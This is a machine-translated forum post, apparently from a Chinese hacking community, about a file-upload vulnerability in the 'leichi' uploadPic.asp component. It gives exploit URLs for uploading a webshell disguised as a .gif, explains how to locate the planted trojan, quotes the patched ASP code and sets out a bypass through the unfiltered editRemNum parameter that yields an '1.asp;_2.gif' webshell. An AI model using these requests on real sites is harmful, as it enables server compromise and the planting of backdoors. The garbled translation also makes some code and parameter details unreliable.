Breakthrough in leichi Upload Vulnerability repair

It is estimated that the test was launched in April. It should be useful to my friends. If you can help me, let's stick it up.
The use of leichi upload was a long time ago, and a patch was released later.

One person asked me to take a few sites and find all the thunderpools with patches. Then I accidentally looked at the code and found this article.

The following is an introduction to leichi upload.

========================================================== =

Assume that the uploadPic. asp File Uploaded By relay is in the admin directory, that is, admin/uploadPic. asp.

We can exploit the vulnerability as follows:

In the browser enter: http://www.xxxx.com/admin/uploadPic.asp? ActionType = mod & picnameappswebshell.aspthe uploaded local file. Change our horse to a file ending with .gif. Then, you can get a webshell named webshell. asp!

Note: How do we know where to upload the webshell we uploaded?

We can look for it here. We can view the article published by the website. Here we can see the article with images added. We can right-click the image and view the attributes, we can know the directory where the trojan is uploaded, our Trojan should be the http://www.xxxx.com/admin/upload/webshell.asp

======================================

After the patch is completed, it is similar to filtering out the symbols of the category and the category. Also, when the definition file name is 1.asp, the returned file name is 1asp.gif.

Dim upload_code, remNum, remFileName, editImageNum, actionType, editRemNum

Upload_code = trim (Request. QueryString ("upload_code "))
EditImageNum = trim (Request. QueryString ("editImageNum "))
ActionType = trim (Request. QueryString ("actionType "))
PicName = trim (Request. QueryString ("picName "))
EditRemNum = trim (Request. QueryString ("editRemNum "))

If actionType = "mod" then
PicName = Right (picName, InstrRev (picName, "/")-1)
End if

If upload_code = "OK" then
Get the image in the article
Dim upload, file, formName, formPath, iCount
FormPath = "../uppic /"
.........
Else
If file. FileSize> 0 then if FileSize> 0, file data exists.
Generate image name
If actionType = "mod" then
RemFileName = replace (Right (picName, len (picName)-Modify Rev (picName, "/"), ".", "") & ". gif"

Else
If editRemNum <> "" then
RemNum = editRemNum
Else
Randomize
RemNum = Int (999-1 + 1) * Rnd + 1) & day (date) & month (date) & year (date) & hour (time) & minute (time) & second (time)
End if
RemFileName = remNum & "_" & (editImageNum + 1) & ". gif"
End if

File. SaveAs Server. mappath (formPath & remFileName) save the file
Response. Write (formPath & remFileName)

We can see that when editRemNum is not empty, remFileName = remNum & "_" & (editImageNum + 1) & ". gif"
However, when parameters are accepted but not filtered, The uploadPic. asp? ActionType = od & editRemNum = 1.asp; & upload_code = OK & editImageNum = 1
Get a WEBSHELL named 1.asp;_2.gif